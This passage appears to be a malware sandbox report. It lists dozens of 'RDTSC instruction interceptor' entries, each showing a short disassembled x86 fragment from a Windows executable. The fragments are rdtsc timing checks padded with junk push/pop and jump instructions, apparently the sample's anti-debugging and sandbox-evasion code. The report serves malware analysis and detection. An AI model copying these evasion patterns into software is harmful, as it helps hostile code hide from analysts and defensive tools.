              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AF2 second address: AB2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1D33 second address: AB1D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AF8 second address: AB2B4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F5444E6F4F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D20D7h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F5444E6F4F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov di, CBC9h 0x00000035 push 00000000h 0x00000037 add dword ptr [ebp+122D1B7Ch], eax 0x0000003d push eax 0x0000003e pushad 0x0000003f jnp 00007F5444E6F4F8h 0x00000045 pushad 0x00000046 popad 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2D35 second address: AB2D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CB7 second address: AB4CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F5444E6F4F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CCB second address: AB4CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CCF second address: AB4CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D2E second address: AB3D38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5444755FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D38 second address: AB3D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D3E second address: AB3D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9F93 second address: AB9FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F5444E6F4F6h 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF6D9 second address: ABF704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5444755FB8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF704 second address: ABF708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF708 second address: ABF711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4DD8 second address: AC4E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F507h 0x00000008 jmp 00007F5444E6F4FBh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F5444E6F502h 0x00000017 jo 00007F5444E6F4FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4E0F second address: AC4E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5444755FB3h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4E2C second address: AC4E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F4FBh 0x00000008 jg 00007F5444E6F4F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jng 00007F5444E6F50Eh 0x00000019 push edx 0x0000001a jmp 00007F5444E6F506h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4F54 second address: 8EF8EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 54FB868Bh 0x00000010 jmp 00007F5444755FB8h 0x00000015 push dword ptr [ebp+122D13F5h] 0x0000001b ja 00007F5444755FA7h 0x00000021 call dword ptr [ebp+122D179Eh] 0x00000027 pushad 0x00000028 jmp 00007F5444755FB0h 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 or dword ptr [ebp+122D17EAh], eax 0x0000003a mov dword ptr [ebp+122D293Dh], eax 0x00000040 mov dword ptr [ebp+122D36A5h], eax 0x00000046 mov esi, 0000003Ch 0x0000004b jc 00007F5444755FACh 0x00000051 mov dword ptr [ebp+122D36A5h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b pushad 0x0000005c je 00007F5444755FACh 0x00000062 mov dword ptr [ebp+122D36A5h], ecx 0x00000068 mov dword ptr [ebp+122D17D1h], edi 0x0000006e popad 0x0000006f lodsw 0x00000071 jmp 00007F5444755FB1h 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a jns 00007F5444755FA7h 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D17EAh], ecx 0x0000008a cld 0x0000008b push eax 0x0000008c pushad 0x0000008d je 00007F5444755FA8h 0x00000093 pushad 0x00000094 popad 0x00000095 push eax 0x00000096 push edx 0x00000097 push ecx 0x00000098 pop ecx 0x00000099 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DEEF second address: A5DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA363 second address: ACA367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA367 second address: ACA36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA36D second address: ACA388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA4FE second address: ACA521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F509h 0x00000007 jne 00007F5444E6F4F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA521 second address: ACA55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F5444755FAEh 0x00000011 jmp 00007F5444755FABh 0x00000016 pop ebx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAA25 second address: ACAA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F4FCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACABCD second address: ACABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAD3F second address: ACAD5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F505h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAD5A second address: ACAD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5444755FB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F5444755FA6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB05E second address: ACB072 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F5444E6F4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d ja 00007F5444E6F4F6h 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2277 second address: AD2289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FACh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2289 second address: AD229F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jg 00007F5444E6F4F6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6471D second address: A64740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5444755FA6h 0x0000000a jmp 00007F5444755FB4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64740 second address: A64753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD80B9 second address: AD80BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6AAD second address: AD6AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6AB1 second address: AD6ABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C2F second address: AD6C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C35 second address: AD6C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6C39 second address: AD6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F02 second address: AD6F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F06 second address: AD6F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5444E6F4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6F12 second address: AD6F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD74D8 second address: AD74DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD77EA second address: AD77FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD77FF second address: AD7809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7F5F second address: AD7F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE6EC second address: ADE6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDAD6 second address: ADDAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5444755FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F5444755FADh 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE30AA second address: AE30AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE30AE second address: AE30B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558A3 second address: A558D1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5444E6F504h 0x00000014 jmp 00007F5444E6F4FEh 0x00000019 jmp 00007F5444E6F4FCh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558D1 second address: A558DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5444755FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A558DB second address: A558DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1F4E second address: AE1F76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5444755FA6h 0x00000009 jmp 00007F5444755FB9h 0x0000000e popad 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DD3 second address: AA3DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4A7A second address: AA4A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4A7F second address: AA4A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2497h], ebx 0x00000012 push 0000001Eh 0x00000014 and ecx, 52836AA9h 0x0000001a push eax 0x0000001b push ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4F1C second address: AA4F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE221A second address: AE2249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5444E6F4F6h 0x00000009 jmp 00007F5444E6F504h 0x0000000e jmp 00007F5444E6F4FDh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2249 second address: AE2262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5444755FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F5444755FB6h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE29C9 second address: AE29D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2C66 second address: AE2C75 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444755FA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2C75 second address: AE2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE5535 second address: AE553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE508D second address: AE5093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE5093 second address: AE509C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE5200 second address: AE5204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE5204 second address: AE520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE520D second address: AE5214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE5214 second address: AE5230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444755FB7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8778 second address: AE877C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7FCD second address: AE7FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8177 second address: AE817B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE817B second address: AE8185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5444755FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8185 second address: AE819D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F504h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8475 second address: AE8479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8479 second address: AE84AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F508h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5444E6F506h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE84AD second address: AE84B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDD93 second address: AEDD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDD9B second address: AEDD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDF6B second address: AEDF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDF71 second address: AEDF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4939 second address: AA493F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA493F second address: AA4945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4945 second address: AA4949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4949 second address: AA498C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F5444755FB9h 0x0000000f jmp 00007F5444755FB3h 0x00000014 nop 0x00000015 jc 00007F5444755FAEh 0x0000001b push eax 0x0000001c or dword ptr [ebp+122D3795h], edx 0x00000022 pop ecx 0x00000023 push 00000004h 0x00000025 mov dword ptr [ebp+122D2C99h], edx 0x0000002b push eax 0x0000002c jg 00007F5444755FAEh 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE3B9 second address: AEE3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE3BE second address: AEE3C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE3C3 second address: AEE3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F5444E6F4F8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F5444E6F501h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE3E9 second address: AEE3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF31FE second address: AF3219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2484 second address: AF2490 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2490 second address: AF24CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F5444E6F504h 0x00000012 jmp 00007F5444E6F509h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B87 second address: AF2B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
